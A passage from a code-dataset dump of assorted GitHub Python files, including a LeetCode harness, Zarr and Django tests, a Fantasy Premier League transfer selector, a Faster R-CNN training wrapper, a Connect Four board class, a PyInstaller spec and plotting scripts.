binaryTree.buildTree([])\n # nTree.buildTree([])\n ]\n inputParaLis2 = [\n 7,\n ]\n inputParaLis3 = [\n None,\n ]\n # !! ====================================\n\n # ! instances that need an empty line\n specialTypeLis = [TreeNode, Node]\n\n # ! function and parameters count\n inputSetCnt = len(inputParaLis1)\n funcCnt = len(myFuncLis)\n funcParaCnt = 1\n if not inputParaLis3[0] is None:\n funcParaCnt = 3\n elif not inputParaLis2[0] is None:\n funcParaCnt = 2\n\n # ! for each input set\n for i in range(inputSetCnt):\n inputPara1 = inputParaLis1[i]\n para1Splitter = '\\n' if isOneInstance(inputPara1, specialTypeLis) else '\\t'\n inputPara2 = None\n para2Splitter = None\n inputPara3 = None\n para3Splitter = None\n\n # ! start a new line if the parameter is a tree\n if funcParaCnt >= 2:\n inputPara2 = inputParaLis2[i]\n para2Splitter = '\\n' if isOneInstance(inputPara2, specialTypeLis) else '\\t'\n if funcParaCnt >= 3:\n inputPara3 = inputParaLis3[i]\n para3Splitter = '\\n' if isOneInstance(para3Splitter, specialTypeLis) else '\\t'\n\n # ! for each function\n for j in range(funcCnt):\n myFunc = myFuncLis[j]\n print('func: \\t%s' % myFunc.__name__)\n\n # ! output parameters\n if funcParaCnt == 1:\n print('input1:%s%s' % (para1Splitter, inputPara1))\n rlt = myFunc(inputPara1)\n if funcParaCnt == 2:\n print('input1:%s%s' % (para1Splitter, inputPara1))\n print('input2:%s%s' % (para2Splitter, inputPara2))\n rlt = myFunc(inputPara1, inputPara2)\n if funcParaCnt == 3:\n print('input1:%s%s' % (para1Splitter, inputPara1))\n print('input2:%s%s' % (para2Splitter, inputPara2))\n print('input3:%s%s' % (para3Splitter, inputPara3))\n rlt = myFunc(inputPara1, inputPara2, inputPara3)\n\n # ! output result\n rltSplitter = '\\n' if isinstance(rlt, TreeNode) else '\\t'\n print('rlt:%s%s' % (rltSplitter, rlt))\n print('==' * 20)\n# endFunc\n\ndef isOneInstance(myInstance, typeLis):\n for curType in typeLis:\n if isinstance(myInstance, curType):\n return True\n return False\n# endFunc\n\ndef main():\n func()\n# endMain\n\n\nif __name__ == \"__main__\":\n main()\n# endIf\n","repo_name":"tgaochn/leetcode","sub_path":"1. solvedProblems/39. Combination Sum/39.py","file_name":"39.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3273362664","text":"\nn = 3\n# constrait l_n <= r_n\nres = []\n# use backtracking\ndef dfs(n,path,res,l_n,r_n):\n if len(path) == 2*n:\n res.append(path)\n if l_n>r_n: # 如果open比close的多,加close\n new_path = path+')'\n dfs(n, new_path, res,l_n,r_n+1)\n if l_n None:\n runner = CliRunner()\n with runner.isolated_filesystem():\n os.mkdir(\"empty.zarr\")\n r = runner.invoke(digest, [\"--digest\", \"zarr-checksum\", \"empty.zarr\"])\n assert r.exit_code == 0\n assert r.output == \"empty.zarr: 481a2f77ab786a0f45aafd5db0971caa-0--0\\n\"\n\n\ndef test_digest_zarr_with_excluded_dotfiles():\n # This test assumes that the Zarr serialization format never changes\n runner = CliRunner()\n with runner.isolated_filesystem():\n dt = np.dtype(\" 3:\n return False\n else:\n return True\n\ndef teamSelector(teamlist, n_weeks):\n\n col_headings = ['GW+{}'.format(i+1) for i in range(0, n_weeks)]\n\n formations = [[3, 4, 3], [3, 5, 2], [4, 3, 3], [4, 4, 2], [4, 5, 1], [5, 3, 2], [5, 4, 1]]\n\n # - Find all players for next n_weeks\n team_inds = np.zeros(11, dtype=int)\n current_inds = np.zeros(11, dtype=int)\n\n teamselection = pd.DataFrame(np.zeros((15, len(col_headings)+2)), columns=['id', 'name'] + col_headings)\n teamselection[['id', 'name']] = teamlist[['id', 'name']]\n teamselection[col_headings] = False\n\n for col_name in col_headings:\n\n X = teamlist[['id', 'position', col_name]].sort_values(by=['position', col_name], ascending=[True, False])\n\n current_inds[0] = X.index[0]\n\n points = 0\n for formation in formations:\n t = 1\n for pos, n_pos in enumerate(formation):\n\n t, s = t+n_pos, t\n current_inds[s:t] = X.loc[X['position']==pos+2, col_name].index[:n_pos].values\n\n if X.loc[current_inds, col_name].sum() > points:\n points = X.loc[current_inds, col_name].sum()\n team_inds = current_inds.copy()\n\n teamselection.loc[team_inds, col_name] = True\n\n return teamselection\n\ndef teamReturn(teamlist, n_weeks, weighting=0.8):\n\n col_headings = ['GW+{}'.format(i+1) for i in range(0, n_weeks)]\n\n formations = [[3, 4, 3], [3, 5, 2], [4, 3, 3], [4, 4, 2], [4, 5, 1], [5, 3, 2], [5, 4, 1]]\n\n # - Find all players for next n_weeks\n current_inds = np.zeros(11, dtype=int)\n\n tot_points = 0\n for k, col_name in enumerate(col_headings):\n\n X = teamlist[['id', 'position', col_name]].sort_values(by=['position', col_name], ascending=[True, False])\n\n current_inds[0] = X.index[0]\n\n points = 0\n for formation in formations:\n t = 1\n for pos, n_pos in enumerate(formation):\n\n t, s = t+n_pos, t\n current_inds[s:t] = X.loc[X['position']==pos+2, col_name].index[:n_pos].values\n\n if X.loc[current_inds, col_name].sum() > points:\n points = X.loc[current_inds, col_name].sum()\n\n tot_points += (weighting**k)*points\n\n return tot_points\n\n\ndef Transfer(pred, team):\n\n if not isinstance(team, fpl.CurrentTeam):\n raise TypeError('Please supply a pyfpl.CurrentTeam object')\n\n balance = team.transfers.loc[0, 'bank']\n\n teamlist = team.essential\n teamlist = teamlist.merge(pred)\n\n # - remove current players from pred\n inds = pred[pred['id'].isin(teamlist['id'])].index\n pred = pred.drop(inds)\n\n W = teamlist.loc\n print(pred.shape)\n\n return teamlist, inds\n\n\nmyteam = fpl.CurrentTeam(retrieve.user_team('chris'))\n\ncgw = retrieve.current_gw()\nn_weeks = 6\n\nbalance = myteam.transfers.loc[0, 'bank']\n\nplist = retrieve.player_list(gw=cgw)\n\n\ndf = datasets.gameweekPrediction()\n\ndf = df[df['GW']<(cgw+n_weeks+1)]\npredictions = df.pivot(index='id', columns='GW', values='predicted_points_scored').reset_index()\n\n\ncols_needed = ['id', 'team', 'element_type', 'now_cost', 'web_name']\npredictions = predictions.merge(plist[cols_needed], on='id', how='left')\npredictions = predictions.rename(columns={'team': 'clubid',\n 'element_type': 'position',\n 'now_cost': 'value',\n 'web_name': 'name'})\n\nr = np.arange(cgw+1, cgw+n_weeks+1, dtype=int)\nGW_cols = ['GW+{}'.format(i+1) for i in range(0,n_weeks)]\npredictions = predictions.rename(columns=dict(zip(r,GW_cols)))\n\nteaminfo = myteam.essential\nteaminfo = teaminfo.merge(predictions[['id', 'name'] + GW_cols], on='id', how='left')\nteaminfo = teaminfo.rename(columns={'selling_price': 'value'})\nteaminfo = teaminfo.sort_values(by='position').reset_index(drop=True)\npredictions = predictions[teaminfo.columns]\n\npredictions.to_csv('prediction.csv')\n\ndrop_inds = predictions[predictions['position'].isna()].index\npredictions = predictions.drop(drop_inds)\npredictions[['clubid', 'position', 'value']] = predictions[['clubid', 'position', 'value']].astype(int)\n\n\n\nteam_ids = teaminfo['id'].values\ninds = predictions[predictions['id'].isin(team_ids)].index\npredictions = predictions.drop(inds)\n\npredictions['tot_return'] = predictions[GW_cols].sum(axis=1)\ndrop_inds = predictions[predictions['tot_return']<3].index\npredictions = predictions.drop(drop_inds)\npredictions = predictions.reset_index(drop=True)\n\n\nmax_prices = np.array([teaminfo.loc[teaminfo['position']==i,'value'].max() for i in range(1,5)]) + balance\n\n# - eliminate those players too expensive\nfor i, price in enumerate(max_prices):\n\n records = (predictions['position']==(i+1)) & (predictions['value']>price)\n inds = predictions[records].index\n if len(inds)>0:\n predictions = predictions.drop(inds)\n\nposition_locs = [[0,1], [2,3,4,5,6], [7,8,9,10,11], [12,13,14]]\n\ncurrent_return = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\nteamselection = teamSelector(teaminfo, n_weeks=6)\n\nN = predictions.shape[0]\n\ntransfers = pd.DataFrame([], columns=['player_out', 'player_in', 'player_cost', 'transfer_cost', 'points_gain'])\n\n# for t, ind in enumerate(predictions.index):\n#\n# # - swap players and check price is ok\n# pos, val = predictions.loc[ind, ['position','value']]\n#\n# # - Check value\n# if val <= teaminfo.loc[j, 'value'] + balance:\n#\n# # - swap in player and check\n# teaminfo.loc[j], temp = predictions.loc[ind], teaminfo.loc[j].copy()\n#\n# # - Check for clubs\n# if teamCheck(teaminfo):\n# tot_points = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\n# if tot_points>current_return:\n# print('{} -> {} [{:.1f}]'.format(temp['name'], teaminfo.loc[j,'name'], tot_points))\n#\n# transfers.loc[transfers.shape[0]] = [teaminfo.loc[j,'id'], teaminfo.loc[j,'name'], teaminfo.loc[j,'value'], tot_points]\n#\n# teaminfo.loc[j] = temp\n#\n# print('{:.1f}% - complete'.format(100*(t+1)/N))\n#\n# transfers.to_csv('possible_transfers.csv', index=False)\n\npredictions = predictions.reset_index(drop=True)\n\nfor ind in predictions.index:\n\n # - swap players and check price is ok\n pos, val_in = predictions.loc[ind, ['position','value']]\n\n for j in position_locs[pos-1]:\n\n val_out = teaminfo.loc[j, 'value']\n # - Check value\n if val_in <= val_out + balance:\n\n # - swap in player and check\n teaminfo.loc[j], temp = predictions.loc[ind], teaminfo.loc[j].copy()\n\n if teamCheck(teaminfo):\n\n alt_return = teamReturn(teaminfo, n_weeks=6, weighting=0.5)\n if alt_return>current_return+0.5:\n transfers.loc[transfers.shape[0]] = [temp['name'], teaminfo.loc[j, 'name'],\n val_in, val_in-val_out, alt_return-current_return]\n print('{} -> {} [{:.1f}]'.format(temp['name'], teaminfo.loc[j,'name'], alt_return-current_return))\n teaminfo.loc[j] = temp\n\n print('{:.1f}% - complete'.format(100*ind/N))\n\ntransfers.to_csv('transfers.csv',index=False)\nteaminfo.to_csv('teaminfo.csv', index=False)\nteamselection.to_csv('selection.csv', index=False)\n\n\ntot_return = teamReturn(teaminfo, 6, 0.6)\n\n","repo_name":"cjoyneruk/pyfpl","sub_path":"other_files/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23570529012","text":"import random\nfrom trucking.model import *\n\nclass ProblemFactory(object):\n \"\"\"Factory class for creation of Problem instances.\n \"\"\" \n \n def createProblemMasterData(self, spokeByName):\n \"\"\"This creates a problem with its master data.\n \n This problem is used as the initial model for the samples.\n \"\"\"\n pb = Problem()\n\n A = Spoke(\"A\", 360, 1080)\n B = Spoke(\"B\", 400, 1150)\n C = Spoke(\"C\", 380, 1200)\n D = Spoke(\"D\", 340, 900)\n E = Spoke(\"E\", 420, 800)\n F = Spoke(\"F\", 370, 1070)\n\n spokes = [A, B, C, D, E, F]\n for s in spokes:\n spokeByName[s.name] = s\n pb.spokes.extend(spokes)\n \n G = Hub(\"G\")\n H = Hub(\"H\")\n \n hubs = [G, H]\n pb.hubs.extend(hubs)\n\n SmallTruck = TruckType(\"SmallTruck\", 400, 10, 55)\n BigTruck = TruckType(\"BigTruck\", 700, 15, 45)\n\n truckTypes = [SmallTruck, BigTruck]\n pb.truckTypes.extend(truckTypes)\n\n loadTimes = [LoadTime(G, SmallTruck, 30),\n LoadTime(G, BigTruck, 55), \n LoadTime(H, SmallTruck, 35),\n LoadTime(H, BigTruck, 50)]\n pb.loadTimes.extend(loadTimes)\n\n routes = [\n Route(A, G, 200),\n Route(A, H, 50),\n Route(B, G, 120),\n Route(B, H, 100),\n Route(C, H, 110),\n Route(D, G, 70),\n Route(D, H, 100),\n Route(E, G, 120),\n Route(E, H, 100),\n Route(F, H, 105)\n ]\n pb.routes = routes\n return pb\n \n \n def createSampleProblem(self):\n \"\"\"This creates a problem with the default master data and a sample\n shipment set.\n \"\"\"\n spokeByName = {}\n pb = self.createProblemMasterData(spokeByName)\n\n A = spokeByName[\"A\"]\n B = spokeByName[\"B\"]\n C = spokeByName[\"C\"]\n D = spokeByName[\"D\"]\n E = spokeByName[\"E\"]\n F = spokeByName[\"F\"]\n\n shipments = [\n Shipment(A, B, 300),\n Shipment(A, C, 250),\n Shipment(A, D, 350),\n Shipment(A, E, 145),\n Shipment(A, F, 300),\n Shipment(B, A, 185),\n Shipment(B, C, 200),\n Shipment(B, D, 221),\n Shipment(B, E, 263),\n Shipment(B, F, 197),\n Shipment(C, A, 143),\n Shipment(C, B, 178),\n Shipment(C, D, 258),\n Shipment(C, E, 221),\n Shipment(C, F, 106),\n Shipment(D, A, 75),\n Shipment(D, B, 135),\n Shipment(D, C, 245),\n Shipment(D, E, 283),\n Shipment(D, F, 155),\n Shipment(E, A, 123),\n Shipment(E, B, 234),\n Shipment(E, C, 143),\n Shipment(E, D, 78),\n Shipment(E, F, 107),\n Shipment(F, A, 201),\n Shipment(F, B, 157),\n Shipment(F, C, 169),\n Shipment(F, D, 212),\n Shipment(F, E, 104),\n ]\n pb.shipments.extend(shipments)\n return pb\n \n \n def createProblemWithRandomShipments(self, seed, mean_qty, standard_deviation):\n \"\"\"Returns a ``Problem`` instance using a fixed logistic network but\n with randomly generated ``Shipment`` orders.\n \n \n Args:\n seed: Seed for random value generator\n mean_qty: Mean value for generating ``Shipment`` quantities\n standard_deviation: Standard deviation value for generating \n ``Shipment`` quantities\n Returns:\n The generated ``Problem`` instance\n \"\"\"\n random.seed(seed)\n spokeByName = {}\n pb = self.createProblemMasterData(spokeByName)\n MIN_QTY = 50\n for source in spokeByName.values():\n for destination in spokeByName.values(): \n if (source != destination): \n quantity = (int)(random.gauss(0,1) *\n standard_deviation + mean_qty)\n quantity = MIN_QTY if quantity < MIN_QTY else quantity\n pb.shipments.append(Shipment(source, destination, quantity))\n return pb\n","repo_name":"IBMDecisionOptimization/DOcloud-Python-client-samples","sub_path":"examples/trucking/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":4257,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"22283918228","text":"from django.test import TestCase, Client\nfrom .models import *\nfrom django.urls import reverse\n\ndef create_booking(album, contact):\n\n return Booking.objects.create(album=contact, contact=contact)\n\n\nclass AlbumModelTests(TestCase):\n\n \n def test_album_is_available(self):\n album = Album(title=\"Test Album\")\n\n self.assertIs(album.available,True)\n\nclass DetailPageTests(TestCase):\n\n def setUp(self):\n\n new_album = Album.objects.create(title=\"New album\")\n\n self.album =Album.objects.get(title=\"New album\")\n\n\n\n def test_detail_page_returns_200(self):\n\n url = reverse('store:detail',args=(self.album.id,))\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code,200)\n\n def test_detail_page_returns_404(self):\n\n url = reverse('store:detail',args=(self.album.id+1,))\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code,404)\n\n\nclass BookingPageTests(TestCase):\n\n def setUp(self):\n\n Contact.objects.create(name=\"Mac Gayver\", email=\"macgayver@gmail.com\")\n\n self.contact = Contact.objects.get(email=\"macgayver@gmail.com\")\n\n Artist.objects.create(name=\"Alan Walker\")\n\n self.artist = Artist.objects.get(name=\"Alan Walker\")\n\n Album.objects.create(title=\"Different World\")\n\n self.album = Album.objects.get(title=\"Different World\")\n\n self.artist.albums.add(self.album)\n\n self.album.artists.add(self.artist)\n\n def test_booking_is_registred(self):\n\n old_bookings = Booking.objects.count()\n\n self.client.post(reverse('store:detail',args=(self.album.id,)),\n\n {\n 'name':self.contact.name,\n 'email':self.contact.email,\n\n }\n \n )\n\n self.assertEqual(Booking.objects.count()-1,old_bookings)\n\n def test_booking_is_not_registred(self):\n\n old_bookings = Booking.objects.count()\n\n self.album.available = False\n\n self.album.save()\n\n self.client.post(reverse('store:detail',args=(self.album.id,)),\n\n {\n 'name':self.contact.name,\n 'email':self.contact.email,\n\n }\n \n )\n\n self.assertEqual(Booking.objects.count(),old_bookings)\n\n\n\n\n\n\n\n\n\n\n# Create your tests here.\n","repo_name":"SamirMaoude/samdisk","sub_path":"store/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"7195791545","text":"\"\"\"\n@file rcnn.py\n@author Chang Yan (cyan13@jhu.edu)\n\"\"\"\n\nimport torchvision\nimport torch\nimport os, time\nimport torch.optim as optim\nimport numpy as np\nfrom logger import Logger\nfrom torch import nn\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\n \nclass Rcnn:\n \n def __init__(self, path, name, num_epochs, batch, pre=True):\n self.model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pre)\n num_classes = 2\n in_features = self.model.roi_heads.box_predictor.cls_score.in_features\n self.model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n self.path = os.path.join(path, name)\n self.device = torch.device(\"cuda:1\" if torch.cuda.is_available() else \"cpu\")\n #self.device = torch.device(\"cpu\")\n self.model.to(self.device)\n self.model.float()\n params = [p for p in self.model.parameters() if p.requires_grad]\n self.optimizer = optim.SGD(params, lr=0.005, momentum=0.9, weight_decay=0.0005)\n self.cur_epoch = 0\n self.epochs = num_epochs\n self.loss = np.infty\n self.best_loss = np.infty\n self.start_time = int(time.time())\n self.freq_for_save = 5\n self.batch = batch\n \n def train_val(self, Xtrain, Ytrain, Xval, Yval):\n \"\"\"\n This function handles both train and validation.\n \"\"\"\n val_history = []\n train_history = []\n\n Logger.log(\"will start training\")\n \n for epoch in range(self.cur_epoch, self.epochs):\n self.cur_epoch = epoch\n train_history.append(self.train(Xtrain, Ytrain))\n Logger.log(f\"train loss {train_history[-1]:.8f}\")\n \n if not epoch % (self.freq_for_save):\n val_history.append(self.val(Xval, Yval))\n Logger.log(f\"{epoch} epoch - val loss {val_history[-1]:.8f}\")\n self.loss = val_history[-1]\n if epoch >= 25 and np.sum(val_history[-2:]) > np.sum(val_history[-4:-2]):\n Logger.log(\"early stop\")\n Logger.log(f\"train history {train_history}\")\n Logger.log(f\"validation history {val_history}\")\n \n break\n\n if not (epoch % (self.freq_for_save)) or self.best_loss > self.loss:\n Logger.log(\"saving\")\n self.save()\n Logger.log(f\"{self.cur_epoch} epoch loss {self.loss:.8f} best loss {self.best_loss:.8f}\")\n \n def train(self, images, boxes):\n self.model.train()\n labels = torch.ones((len(images), 1), dtype = torch.int64).to(self.device)\n boxes = torch.from_numpy(boxes.reshape((boxes.shape[0], 1, 4))).float().to(self.device)\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n targets = []\n for i in range(len(images)):\n d = {}\n d['boxes'] = boxes[i]\n d['labels'] = labels[i]\n targets.append(d)\n \n history = []\n size = int(len(images) / self.batch)\n for i in range(self.batch):\n self.optimizer.zero_grad()\n X = images[i*size: (i+1)*size]\n Y = targets[i*size: (i+1)*size]\n output = self.model(X, Y)\n losses = sum(loss for loss in output.values())\n losses.backward()\n self.optimizer.step()\n history.append(float(losses))\n \n return np.sum(np.array(history)) / self.batch\n \n def predict(self, images):\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n self.model.eval()\n predictions = self.model(images)\n print(predictions)\n boxes = []\n scores = []\n for case in predictions:\n best_i = -1\n best_scores = torch.zeros(1).to(self.device)\n for i in range(case['scores'].shape[0]):\n if case['labels'][i] == 1 and case['scores'][i] >= best_scores:\n best_scores = case['scores'][i]\n best_i = i\n if best_i != -1:\n boxes.append(case['boxes'][best_i].detach().cpu().numpy())\n scores.append(best_scores.detach().cpu().numpy())\n else:\n boxes.append(np.array([0, 0, 0, 0]))\n scores.append(0)\n return boxes, scores\n \n def val(self, images, boxes):\n \"\"\"\n This function validates one epoch of the model.\n \"\"\"\n self.model.train()\n\n with torch.no_grad():\n labels = torch.ones((len(images), 1), dtype = torch.int64).to(self.device)\n boxes = torch.from_numpy(boxes.reshape((boxes.shape[0], 1, 4))).float().to(self.device)\n images = list(torch.from_numpy(image).float().to(self.device) for image in images)\n targets = []\n for i in range(len(images)):\n d = {}\n d['boxes'] = boxes[i]\n d['labels'] = labels[i]\n targets.append(d)\n \n history = []\n size = int(len(images) / self.batch)\n for i in range(self.batch):\n self.optimizer.zero_grad()\n X = images[i*size: (i+1)*size]\n Y = targets[i*size: (i+1)*size]\n output = self.model(X, Y)\n losses = sum(loss for loss in output.values())\n history.append(float(losses))\n \n return np.sum(np.array(history)) / self.batch\n \n def save(self):\n if self.best_loss > self.loss:\n self.best_loss = self.loss\n torch.save(self.model.state_dict(), self.path)\n \n def load(self):\n self.model.load_state_dict(torch.load(self.path, map_location = \"cpu\"))\n self.model.eval()\n ","repo_name":"Evenstarneko/Machine-learning","sub_path":"Final Project/rcnn.py","file_name":"rcnn.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23230558866","text":"from itertools import permutations\n\ndef isPrime(num):\n if num <= 1:\n return False\n if num == 2:\n return True\n for i in range(2, num):\n if num % i == 0:\n return False\n return True\n \n \ndef solution(numbers):\n primes = set()\n for idx in range(1, len(numbers)+1):\n pers = list(map(int, map(''.join, list(permutations(numbers, idx)))))\n print(pers)\n for per in pers:\n if isPrime(per):\n primes.add(per)\n answer = len(primes)\n return answer","repo_name":"OTKRyu/algorithm_problem_solving","sub_path":"brute_force/programmers_42839.py","file_name":"programmers_42839.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12914957504","text":"\nclass Board:\n\n def __init__(self, n_rows, n_cols):\n m = []\n for i in range(n_rows):\n l = [0 for _ in range(n_cols)]\n m.append(l)\n self.field = m\n self.game_ended = False\n self.cols = n_cols\n self.rows = n_rows\n self.height = [0 for _ in range(n_cols)]\n self.last_mover = -1\n self.last_col = -1\n\n def move_legal(self, col):\n if col >= self.cols:\n raise ValueError(\"Column is out of bounds1\")\n if self.field[self.rows-1][col] != 0:\n return False\n return True\n\n def move(self, col, player):\n if not self.move_legal(col):\n return False\n self.field[self.height[col]][col] = player\n self.height[col] += 1\n self.last_mover = player\n self.last_col = col\n return True\n\n def undo_move(self, col):\n if col >= self.cols:\n raise ValueError(\"Column is out of bounds2\")\n if self.height[col] == 0:\n return False\n self.field[self.height[col]-1][col] = 0\n self.height[col] -= 1\n return True\n\n def game_end(self, last_col):\n if last_col >= self.cols:\n raise ValueError(\"Column is out of bound3\")\n col = last_col\n row = self.height[last_col] - 1\n if row < 0:\n return False, -1\n player = self.field[row][col]\n\n # uspravno\n seq = 1\n r = row - 1\n while r >= 0 and self.field[r][col] == player:\n seq += 1\n r -= 1\n if seq > 3:\n return True, player\n\n # vodoravno\n seq = 0\n c = col\n while (c-1) >= 0 and self.field[row][c-1] == player:\n c -= 1\n while c < self.cols and self.field[row][c] == player:\n seq += 1\n c += 1\n if seq > 3:\n return True, player\n\n # koso s lijeva na desno\n seq = 0\n r = row\n c = col\n while (c-1) >= 0 and (r-1) >= 0 and self.field[r-1][c-1] == player:\n c -= 1\n r -= 1\n while c < self.cols and r < self.rows and self.field[r][c] == player:\n c += 1\n r += 1\n seq += 1\n if seq > 3:\n return True, player\n\n # koso s desna na lijevo\n seq = 0\n r = row\n c = col\n while (c-1) >= 0 and (r+1) < self.rows and self.field[r+1][c-1] == player:\n c -= 1\n r += 1\n while c < self.cols and r >= 0 and self.field[r][c] == player:\n c += 1\n r -= 1\n seq += 1\n if seq > 3:\n return True, player\n return False, -1\n\n def __str__(self):\n s = \"\"\n for i in range(self.rows-1, -1, -1):\n s += \"\\n\"\n for j in range(self.cols):\n s += str(self.field[i][j])\n s += \" \"\n return s\n\n\n\n\n","repo_name":"zvonimir-rezo/parallel-programming","sub_path":"lab2/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"11822656223","text":"# -*- mode: python -*-\n\nblock_cipher = None\n\nfrom site import getsitepackages\n\ninclude_files = [\n ('./README.md', '.'),\n ('license.txt', '.'),\n ('*.cfg.default', '.'),\n ('version', '.'),\n ('art', 'art'),\n ('charsets', 'charsets'),\n ('palettes', 'palettes'),\n ('artscripts', 'artscripts'),\n ('formats', 'formats'),\n ('shaders', 'shaders'),\n ('games', 'games'),\n ('ui/*.png', 'ui'),\n ('docs/html/*.*', 'docs/html'),\n ('docs/html/generated/pdoc_toc.html', 'docs/html/generated'),\n # pyinstaller doesn't include pdoc templates\n (getsitepackages()[0] + '/pdoc/templates/*.mako', 'pdoc/templates')\n]\n\ninclude_bins = [\n ('/usr/local/Cellar/sdl2/2.0.10/lib/libSDL2-2.0.0.dylib', '.'),\n ('/usr/local/Cellar/sdl2_mixer/2.0.4/lib/libSDL2_mixer-2.0.0.dylib', '.'),\n ('/usr/local/Cellar/flac/1.3.3/lib/libFLAC.8.dylib', '.'),\n ('/usr/local/Cellar/libmikmod/3.3.11.1/lib/libmikmod.3.dylib', '.'),\n ('/usr/local/Cellar/libmodplug/0.8.9.0/lib/libmodplug.1.dylib', '.'),\n ('/usr/local/Cellar/libogg/1.3.4/lib/libogg.0.dylib', '.'),\n ('/usr/local/Cellar/libvorbis/1.3.6/lib/libvorbis.0.dylib', '.'),\n ('/usr/local/Cellar/libvorbis/1.3.6/lib/libvorbisfile.3.dylib', '.'),\n ('/usr/local/Cellar/smpeg2/2.0.0/lib/libsmpeg2-2.0.0.dylib', '.')\n]\n\na = Analysis(['playscii.py'],\n pathex=['./'],\n binaries=include_bins,\n datas=include_files,\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None,\n excludes=None,\n win_no_prefer_redirects=None,\n win_private_assemblies=None,\n cipher=block_cipher)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='playscii',\n debug=False,\n strip=None,\n upx=True,\n console=False )\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='playscii')\napp = BUNDLE(coll,\n name='Playscii.app',\n icon='ui/playscii.icns',\n bundle_identifier='net.jplebreton.playscii')\n","repo_name":"michael-lazar/playscii","sub_path":"playscii_mac.spec","file_name":"playscii_mac.spec","file_ext":"spec","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"51"} +{"seq_id":"73915165597","text":"import os\nimport math\nimport csv\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfsize = 20\n\nparas = 'False'\nreader = csv.DictReader(open('./data/both_ee_GS_varyingJ_size52_bcOO_sigma%s.csv' % paras, 'r'), delimiter=',')\n\nx = []\nbEE0 = []\nmEE0 = []\nfor row in reader:\n print(row)\n x.append(float(row['J']))\n bEE0.append(float(row['bee']))\n mEE0.append(float(row['mee']))\n\nparas = 'True'\nreader = csv.DictReader(open('./data/both_ee_GS_varyingJ_size52_bcOO_sigma%s.csv' % paras, 'r'), delimiter=',')\n\nbEE1 = []\nmEE1 = []\nfor row in reader:\n print(row)\n bEE1.append(float(row['bee']))\n mEE1.append(float(row['mee']))\n\nfig = plt.figure(figsize = (8, 4))\nmpl.rcParams['axes.linewidth'] = 1.5\nplt.rc('text', usetex=True)\n# plt.rc('font', family= 'serif')\n\nax1 = fig.add_subplot(121)\nax1.set_title('(a) $t$-$J$ model', fontsize=fsize, x=0.2, y=0.9)\nax1.set_xlim(0.0, 10.0)\nax1.set_ylim(0.5, 5.0)\n# ax.axvline(x=2.05, color='red', linestyle='-.', linewidth=1)\nax1.plot(x[1::2], bEE0[1::2], '->', color='blue', label='bEE', linewidth=0.5)\nax1.plot(x[1::2], mEE0[1::2], '-o', color='red', label='mEE', linewidth=0.5)\nax1.legend(loc='upper right', frameon=False, fontsize=fsize)\nax1.set_xlabel('$J/t$', fontsize=fsize)\n# ax1.set_yticklabels('', visible=False)\n# plt.setp(ax1.get_yticklabels(), visible=False)\n# plt.ylabel('spin current aplitude', fontsize=fs)\n# plt.setp(ax1.get_xticklabels(), fontsize=fs)\n# ax1.ticklabel_format(axis='y', style='sci', scilimits=(0, 0))\nax1.tick_params(axis='both', labelsize=fsize, direction='in')\n# ax1.tick_params('x', labelsize=16)\n# ax1.tick_params('y', labelsize=16)\n\nax2 = fig.add_subplot(122, sharey=ax1)\nax2.set_title('(b) $\\sigma\\cdot{t}$-$J$ model', fontsize=fsize, x=0.25, y=0.9)\nax2.set_xlim(0.0, 10.0)\nax2.set_ylim(0.0, 5.0)\nax2.plot(x[1::2], bEE1[1::2], '->', color='blue', label='bEE', linewidth=0.5)\nax2.plot(x[1::2], mEE1[1::2], '-o', color='red', label='mEE', linewidth=0.5)\nax2.legend(loc='upper right', frameon=False, fontsize=fsize)\nax2.set_xlabel('$J/t$', fontsize=fsize)\n# ax2.set_yticklabels('', visible=False)\nplt.setp(ax2.get_yticklabels(), visible=False)\nax2.tick_params(axis='both', labelsize=fsize, direction='in')\n\nimage = 'both_ee_GS_size52_varyingJ.pdf'\n# paras_image = (size, bounCon)\nfig.tight_layout()\nplt.savefig(image, format='PDF')\n# plt.show()\n","repo_name":"intuitionofmind/exact_diagonalization","sub_path":"one_hole_tjmodel_1d/py/plot_both_ee_varyingJ.py","file_name":"plot_both_ee_varyingJ.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10332915389","text":"import csv\r\ndata=[]\r\nwith open(\"NewData.csv\",\"r\") as f:\r\n csvReader=csv.reader(f)\r\n for row in csvReader:\r\n data.append(row)\r\n\r\nheaders=data[0]\r\nplanetData=data[1:]\r\nfor dataPoints in planetData:\r\n 